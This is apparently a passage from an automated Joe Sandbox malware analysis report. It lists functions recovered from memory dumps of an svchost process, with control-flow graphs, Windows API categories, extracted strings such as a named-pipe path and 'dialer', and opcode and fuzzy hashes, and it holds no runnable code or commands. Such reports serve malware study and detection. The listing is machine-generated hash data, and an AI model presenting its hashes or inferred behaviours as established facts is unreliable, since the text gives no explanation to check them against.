534->459 534->524 535->472 556 282b8d79c15-282b8d79c72 call 282b8d79870 537->556 557 282b8d79bf0-282b8d79c02 537->557 545 282b8d79c0c-282b8d79c10 538->545 546 282b8d79c7b 538->546 562 282b8d79a76-282b8d79a80 call 282b8d7a99c 541->562 563 282b8d79a8b 541->563 545->512 547 282b8d79c80 546->547 547->516 556->547 557->537 557->538 566 282b8d79a86-282b8d79def call 282b8d786ac call 282b8d7a3f4 call 282b8d788a0 562->566 567 282b8d79df0-282b8d79df5 call 282b8d7baa8 562->567 563->464 566->567 567->506
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction ID: 9f7047700bf2f4ca58607d1fec6b191b3a37d6535c9bb249292ca53d2612114c
                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction Fuzzy Hash: F0E1657B607A82DAEB609B75948839D77A0F745BD8F008116EE8D57F9ACF38C499C700
                                                          Function 00000282B8DAA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 577 282b8daa544-282b8daa5ac call 282b8dab414 580 282b8daa5b2-282b8daa5b5 577->580 581 282b8daaa13-282b8daaa1b call 282b8dac748 577->581 580->581 582 282b8daa5bb-282b8daa5c1 580->582 584 282b8daa690-282b8daa6a2 582->584 585 282b8daa5c7-282b8daa5cb 582->585 587 282b8daa963-282b8daa967 584->587 588 282b8daa6a8-282b8daa6ac 584->588 585->584 589 282b8daa5d1-282b8daa5dc 585->589 592 282b8daa9a0-282b8daa9aa call 282b8da9634 587->592 593 282b8daa969-282b8daa970 587->593 588->587 590 282b8daa6b2-282b8daa6bd 588->590 589->584 591 282b8daa5e2-282b8daa5e7 589->591 590->587 595 282b8daa6c3-282b8daa6ca 590->595 591->584 596 282b8daa5ed-282b8daa5f7 call 282b8da9634 591->596 592->581 603 282b8daa9ac-282b8daa9cb call 282b8da7940 592->603 593->581 597 282b8daa976-282b8daa99b call 282b8daaa1c 593->597 600 282b8daa6d0-282b8daa707 call 282b8da9a10 595->600 601 282b8daa894-282b8daa8a0 595->601 596->603 611 282b8daa5fd-282b8daa628 call 282b8da9634 * 2 call 282b8da9d24 596->611 597->592 600->601 615 282b8daa70d-282b8daa715 600->615 601->592 604 282b8daa8a6-282b8daa8aa 601->604 608 282b8daa8ac-282b8daa8b8 call 282b8da9ce4 604->608 609 282b8daa8ba-282b8daa8c2 604->609 608->609 622 282b8daa8db-282b8daa8e3 608->622 609->592 614 282b8daa8c8-282b8daa8d5 call 282b8da98b4 609->614 645 282b8daa62a-282b8daa62e 611->645 646 282b8daa648-282b8daa652 call 282b8da9634 611->646 614->592 614->622 619 282b8daa719-282b8daa74b 615->619 624 282b8daa751-282b8daa75c 619->624 625 282b8daa887-282b8daa88e 619->625 626 282b8daa8e9-282b8daa8ed 622->626 627 282b8daa9f6-282b8daaa12 call 282b8da9634 * 2 call 282b8dac6a8 622->627 624->625 628 282b8daa762-282b8daa77b 624->628 625->601 625->619 630 282b8daa900 626->630 631 282b8daa8ef-282b8daa8fe call 282b8da9ce4 626->631 627->581 632 282b8daa781-282b8daa7c6 call 282b8da9cf8 * 2 628->632 633 282b8daa874-282b8daa879 628->633 641 282b8daa903-282b8daa90d call 282b8dab4ac 630->641 631->641 658 282b8daa804-282b8daa80a 632->658 659 282b8daa7c8-282b8daa7ee call 282b8da9cf8 call 282b8daac38 632->659 638 282b8daa884 633->638 638->625 641->592 656 282b8daa913-282b8daa961 call 282b8da9944 call 282b8da9b50 641->656 645->646 650 282b8daa630-282b8daa63b 645->650 646->584 662 282b8daa654-282b8daa674 call 282b8da9634 * 2 call 282b8dab4ac 646->662 650->646 655 282b8daa63d-282b8daa642 650->655 655->581 655->646 656->592 666 282b8daa80c-282b8daa810 658->666 667 282b8daa87b 658->667 677 282b8daa7f0-282b8daa802 659->677 678 282b8daa815-282b8daa872 call 282b8daa470 659->678 683 282b8daa68b 662->683 684 282b8daa676-282b8daa680 call 282b8dab59c 662->684 666->632 668 282b8daa880 667->668 668->638 677->658 677->659 678->668 683->584 687 282b8daa9f0-282b8daa9f5 call 282b8dac6a8 684->687 688 282b8daa686-282b8daa9ef call 282b8da92ac call 282b8daaff4 call 282b8da94a0 684->688 687->627 688->687
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction ID: 86c0dc07b22feff46399c6c09780835403e4d16b4c0d9a56b20d71d63e5f59b7
                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction Fuzzy Hash: ECE17A7A602B81CAEB609B75944839D77A4F744BDCF648216EBAD57B99CF34C089C700
                                                          Function 00000282B8DAF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction ID: cd091b6a93165e0fa49a28712ffc36f56f2a0c163a85abcea78716e0674f3bcc
                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction Fuzzy Hash: 8941D63A313A82D1FA15CB76A8087552391B745FE8F25C1279E2E97F84EF38C44D8304
                                                          Function 00000282B8DA104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction ID: af3ea76024db07620d8c46ae163bb404d87c82d6889c4f2bd5964dee2234aba6
                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction Fuzzy Hash: 5B414976216BC5C6EB60CF61E44879A77A1F388BD8F14812ADB8A07A58DF38C449CB00
                                                          Function 00000282B8DAD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,00000282B8DAC7DE,?,?,?,?,?,?,?,?,00000282B8DACF9D,?,?,00000001), ref: 00000282B8DAD087
                                                          • FlsSetValue.KERNEL32(?,?,?,00000282B8DAC7DE,?,?,?,?,?,?,?,?,00000282B8DACF9D,?,?,00000001), ref: 00000282B8DAD0A6
                                                          • FlsSetValue.KERNEL32(?,?,?,00000282B8DAC7DE,?,?,?,?,?,?,?,?,00000282B8DACF9D,?,?,00000001), ref: 00000282B8DAD0CE
                                                          • FlsSetValue.KERNEL32(?,?,?,00000282B8DAC7DE,?,?,?,?,?,?,?,?,00000282B8DACF9D,?,?,00000001), ref: 00000282B8DAD0DF
                                                          • FlsSetValue.KERNEL32(?,?,?,00000282B8DAC7DE,?,?,?,?,?,?,?,?,00000282B8DACF9D,?,?,00000001), ref: 00000282B8DAD0F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction ID: cf1912d38c56e9d0b9bb2aff7e3c89f6e781e95c769fa7a95d81369c6372d791
                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction Fuzzy Hash: 5B1196787032C6C1F9685735955E76953456B443F8F38D327AB3E86EEADE38C4094700
                                                          Function 00000282B8DA7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: ae738361689c5affa32f538ea57ddd87ede27064e60dcc406d0cca73dcb18b1e
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 7F8180396032C3C6FA54AB76A4493992795AB457C8F28C427DBAC47F96DF38C44D8700
                                                          Function 00000282B8DA9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction ID: 5d176837c9f5bd5948461017589dbd6d9a3c5dd1ec2e5fdcfead2a15e7d30b4f
                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction Fuzzy Hash: BF31D839313A82F1EE11DB62A44876523D4B748BE8F6989279E3E47F95DF38C55D8300
                                                          Function 00000282B8DB3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction ID: 0d34e0fe6345521840d9ca70e98e1576d2bdd3e9db644b4b506c389e172117dc
                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction Fuzzy Hash: 6C119435313BC1C6E7509B62F84871977A4F788FE8F048216EA6E87B94CF38C4188740
                                                          Function 00000282B8DA3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction ID: 769dd6d7f783667e3a674b5d09c2110f5df5f094463c4bdbb9d2a8cf1116fc46
                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction Fuzzy Hash: 8C11183A706782C2EB189B22F41876963A5FB48BD9F54802ADE9D07B54EF3DC509C704
                                                          Function 00000282B8DA5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                          • Instruction ID: 3a4d87696fe1da6a5585b3dc67f1a5efd865867ef366a6ffdae56a61d6b7a74e
                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                          • Instruction Fuzzy Hash: 5BD1977A206B89C1DA709B6AE49835A77B0F388BC8F104116EBDD47BA9CF38C555CF00
                                                          Function 00000282B8DA2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction ID: 66fad73e07df2be7a7ca2ac580dbade2e7ead8dc3972bd472d19fc2c943192db
                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                          • Instruction Fuzzy Hash: 45314A3A603B97C2EA549F67A54876A67A1BB44BC8F1880229F5C47F59EF34C4A98700
                                                          Function 00000282B8DACFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction ID: a54571451752ce2697a19ed4d8cad1b9a852af22c7a1153f469647367b25b001
                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                          • Instruction Fuzzy Hash: 2D1160782032C2C1FA68A771954D7292341AB457FCF34C727AA3E87EEADE38C4099700
                                                          Function 00000282B8DA199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction ID: 9272cd260ba7363013b749afc034356d5b5ab29548a8cfde92ff9377c0213dbb
                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                          • Instruction Fuzzy Hash: D0015B35302A86C2EA10DB62F45875963A5F788BC8F588036DE5E43B54DE38C54EC700
                                                          Function 00000282B8DA36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction ID: 6d3d04602b778902adf98de44120c6bdbc75fc129316515539f5171afa9326d9
                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                          • Instruction Fuzzy Hash: 77011B79213782C2EB249B36F81C71563A0BB59BCAF14842ACA5D07B54EF3DC10C8700
                                                          Function 00000282B8DA9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction ID: 9718b02827e895bf32a2856adf28f9f7b3a767ba55d198c8e69c270819e1e90a
                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction Fuzzy Hash: 4F51793A603682EAEB149B35E44CB593796F344BCCF20C126DB3A47B88EF75D8498704
                                                          Function 00000282B8DA8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction ID: b781557a9611b279869a6a421f5d738713085ae993feb6b517c4d05f080ccde1
                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction Fuzzy Hash: C631783A203681E6E714DB31E848B5937A5F340BCCF25C016AF6A43B89DF39C948C704
                                                          Function 00000282B8DA1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction ID: a2d11532102ec64a0cccc59cef3bfadcfe20f04bbdc7177808c429e046457d99
                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                          • Instruction Fuzzy Hash: 22F03C76306686D2EB608F71F8887596761F748BCCF94C022DA4D46E58DE3CC68ECB00
                                                          Function 00000282B8DABC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction ID: 54ba2bf3ee25cbccdafaf85406e38bfd7ebcd12884f364bd2e06c536a986f35a
                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                          • Instruction Fuzzy Hash: D3F06279213786C2EB148B39F84C7596320EB847E9F54871ADA6E46AE4CF3CC44D8300
                                                          Function 00000282B8DA3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction ID: 84321b4a74d312ad8efb89cc981d5ed675dea6d677b627edee6ffcbeca1e1182
                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                          • Instruction Fuzzy Hash: 94F05838207BC6C2EA448F62F9482196361AB48FC8F08C032EE5E47F28DE38C4498700
                                                          Function 00000282B8DA50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                          • Instruction ID: 0769daac92b18a1bbfd6c76060551703688e3264451a2067bbc4ebbb8783f1e8
                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                          • Instruction Fuzzy Hash: 4302963621ABC5C6EB608B65E49435AB7B1F3C4794F204016EB9E87BA9DF79C458CF00
                                                          Function 00000282B8DA5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                          • Instruction ID: a353272f5eb53a60b66a85c16fbff34d38b6549df19bbade90812872944bbb0b
                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                          • Instruction Fuzzy Hash: 0361AC3A51BA85C6E6608B66E44831A77B0F3847D8F204116EB9E47FA8DF7CC459CF00
                                                          Function 00000282B8D83504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 982968e558aeb46b6c346124380bf7d494ea0aad416e13045159e70fd9f34f7e
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 1911EE7A517AC381F65C1139D44D35A13805758FFCF84C66AA96E06EDACE64E44C4300
                                                          Function 00000282B8DB4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 7d0e014a4c442e3fe073ebf9febd7f9deaae7e8f9a7c3392034e0552d9ceec88
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 5811513EE13ED3A1F6A49678D46D36913437B683FCF18C626A97E06ED6CE24C8495310
                                                          Function 00000282B8D7F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
